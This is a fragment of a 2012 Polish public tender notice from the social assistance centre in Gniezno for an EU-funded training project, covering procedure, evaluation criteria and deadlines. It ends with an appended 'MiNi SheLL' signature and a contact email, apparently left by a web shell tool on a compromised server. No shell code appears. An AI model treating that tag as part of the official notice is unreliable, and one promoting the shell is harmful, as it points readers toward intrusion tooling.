<p>Oświadczenie o wpisie instytucji szkoleniowej do rejestru instytucji szkoleniowych prowadzonego przez właściwy ze względu na siedzibę instytucji Wojewódzki Urząd Pracy aktualnego na rok 2012 wraz z wydrukiem ze strony internetowej www.ris.praca.gov.pl. potwierdzającym powyższe</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mops.gniezno.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Ośrodek Pomocy Społecznej w Gnieźnie ul. Kolejowa 2, 62-200 Gniezno III p. ok. 05.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.10.2012 godzina 10:00, miejsce: Miejski Ośrodek Pomocy Społecznej w Gnieźnie ul. Kolejowa 2, 62-200 Gniezno III p. ok. 07-SEKRETARIAT.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Edukacja ku samodzielności - propagowanie aktywnej integracji osób oddalonych od rynku pracy w mieście Gnieźnie współfinansowanego przez Unię Europejską w ramach Europejskiego Funduszu Społecznego, Priorytet VII, Działanie 7.1, Poddziałanie 7.1.1 Programu Operacyjnego Kapitał Ludzki.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com